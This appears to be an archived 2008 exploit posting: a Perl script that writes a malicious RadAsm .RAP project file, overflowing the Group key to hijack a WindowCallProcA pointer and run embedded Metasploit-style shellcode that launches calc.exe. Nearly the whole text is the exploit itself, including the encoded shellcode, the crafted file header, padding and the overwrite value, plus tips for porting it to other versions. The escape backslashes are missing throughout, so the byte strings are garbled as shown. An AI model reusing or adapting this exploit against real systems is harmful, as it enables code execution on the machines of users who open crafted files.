RadAsm <= 2.2.1.5 (.RAP File) WindowCallProcA Pointer Hijack Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RadAsm <= 2.2.1.5 (.RAP File) WindowCallProcA Pointer Hijack Exploit
# Published : 2008-12-03
# Author : DATA_SNIPER
# Previous Title : Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit
# Next Title : Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC
#!/usr/bin/perl
# RadAsm <=2.2.1.5 WindowCallProcA Pointer Hijack Exploit
#Tested on Windows XP SP2 FR,perhaps work as will underWindows XP SP3.
#Long buffer passed to the program by Group key in the project file ".rap files" can lead to Overwrite the pointer of 
#WindowCallProcA that was stored in memory.
#So we will over write the pointer and make it point to our shellcode address
#This exploit was dedicated to the previous version "im to lazy to make other exploit for the newest version :)" 2.2.1 #if you want to build your own exploit, pay attention to the address of shellcode and the buffer befor and after the #shellcode.
#Sorry for my bad english :=)
#greetZ to:Gaming_Master,Mouradpr,Pirat_Digital,Koudelka,djug,Alpha_Hunter,DeltaAzize,synt_err,super-crystal,Al-alamE
#Anaconda,AT4RE TEAM,Arab4Services TEAM,All Algerian Hackerz.

print "nRadAsm <=2.2.1.5 WindowCallProcA Pointer Hijack Exploitn";
print "Discovered by DATA_SNIPERn";
print "n";
print "[->] Building  poc.rap..n";
print "[->] poc.rap Created have unf :)n";
# win32_exec -  EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x34".
"x42x30x42x30x42x30x4bx58x45x44x4ex43x4bx38x4ex47".
"x45x30x4ax47x41x30x4fx4ex4bx38x4fx34x4ax31x4bx48".
"x4fx55x42x32x41x30x4bx4ex49x44x4bx48x46x33x4bx58".
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x38x42x4c".
"x46x47x47x50x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e".
"x46x4fx4bx43x46x55x46x32x46x50x45x37x45x4ex4bx48".
"x4fx35x46x42x41x50x4bx4ex48x56x4bx58x4ex30x4bx44".
"x4bx58x4fx35x4ex51x41x50x4bx4ex4bx48x4ex31x4bx58".
"x41x50x4bx4ex49x38x4ex35x46x52x46x50x43x4cx41x33".
"x42x4cx46x56x4bx38x42x44x42x43x45x58x42x4cx4ax47".
"x4ex30x4bx48x42x54x4ex30x4bx38x42x37x4ex51x4dx4a".
"x4bx58x4ax46x4ax30x4bx4ex49x50x4bx48x42x38x42x4b".
"x42x30x42x50x42x50x4bx38x4ax36x4ex53x4fx45x41x33".
"x48x4fx42x56x48x35x49x38x4ax4fx43x38x42x4cx4bx47".
"x42x45x4ax46x50x57x4ax4dx44x4ex43x37x4ax36x4ax49".
"x50x4fx4cx48x50x50x47x45x4fx4fx47x4ex43x36x41x56".
"x4ex36x43x36x50x52x45x46x4ax57x45x56x42x30x5a";

$FileHeader =
"x5Bx50x72x6Fx6Ax65x63x74x5Dx0Dx0Ax41x73x73x65x6Dx62x6Cx65x72x3Dx6Dx61x73x6Dx0Dx0Ax47x72x6Fx75x70".
"x3Dx31x0Dx0Ax47x72x6Fx75x70x45x78x70x61x6Ex64x3Dx31x0Dx0Ax5Bx46x69x6Cx65x73x5Dx0Dx0Ax31x3Dx41x56".
"x50x20x4Fx76x65x72x2Ex41x73x6Dx0Dx0Ax32x3Dx41x56x50x20x4Fx76x65x72x2Ex49x6Ex63x0Dx0Ax5Bx4Dx61x6B".
"x65x46x69x6Cx65x73x5Dx0Dx0Ax30x3Dx41x56x50x20x4Fx76x65x72x2Ex72x65x73x0Dx0Ax5Bx4Dx61x6Bx65x44x65".
"x66x5Dx0Dx0Ax4Dx65x6Ex75x3Dx30x2Cx31x2Cx31x2Cx31x2Cx31x2Cx31x2Cx31x2Cx30x2Cx30x2Cx30x2Cx30x2Cx30".
"x2Cx30x2Cx30x2Cx30x2Cx30x0Dx0Ax31x3Dx34x2Cx4Fx2Cx24x42x5Cx52x43x2Ex45x58x45x20x2Fx76x2Cx31x0Dx0A".
"x32x3Dx33x2Cx4Fx2Cx24x42x5Cx4Dx4Cx2Ex45x58x45x20x2Fx63x20x2Fx63x6Fx66x66x20x2Fx43x70x20x2Fx6Ex6F".
"6Cx6Fx67x6Fx20x2Fx49x22x24x49x22x2Cx32x0Dx0Ax33x3Dx35x2Cx4Fx2Cx24x42x5Cx4Cx49x4Ex4Bx2Ex45x58x45".
"x20x2Fx53x55x42x53x59x53x54x45x4Dx3Ax57x49x4Ex44x4Fx57x53x20x2Fx52x45x4Cx45x41x53x45x20x2Fx56x45".
"x52x53x49x4Fx4Ex3Ax34x2Ex30x20x2Fx4Cx49x42x50x41x54x48x3Ax22x24x4Cx22x20x2Fx4Fx55x54x3Ax22x24x35".
"x22x2Cx33x0Dx0Ax34x3Dx30x2Cx30x2Cx2Cx35x0Dx0Ax35x3Dx72x73x72x63x2Ex6Fx62x6Ax2Cx4Fx2Cx24x42x5Cx43".
"x56x54x52x45x53x2Ex45x58x45x2Cx72x73x72x63x2Ex72x65x73x0Dx0Ax36x3Dx2Ax2Ex6Fx62x6Ax2Cx4Fx2Cx24x42".
"x5Cx4Dx4Cx2Ex45x58x45x20x2Fx63x20x2Fx63x6Fx66x66x20x2Fx43x70x20x2Fx6Ex6Fx6Cx6Fx67x6Fx20x2Fx49x22".
"x24x49x22x2Cx2Ax2Ex61x73x6Dx0Dx0Ax37x3Dx30x2Cx30x2Cx22x24x45x5Cx4Fx6Cx6Cx79x44x62x67x22x2Cx35x0D".
"x0Ax5Bx47x72x6Fx75x70x5Dx0Dx0Ax47x72x6Fx75x70x3D";
$hijackedPointer = "x46x52x49x00";
$overflow = "x41" x 2143 ;
$INCSELEDGE = "x41" x 66 ;
$SD = "x00x0Dx0A" ;
open(my $poc, "> POC.rap");
print $poc $FileHeader.$INCSELEDGE.$shellcode.$overflow.$hijackedPointer.$SD;
close($poc);

# www.Syue.com [2008-12-03]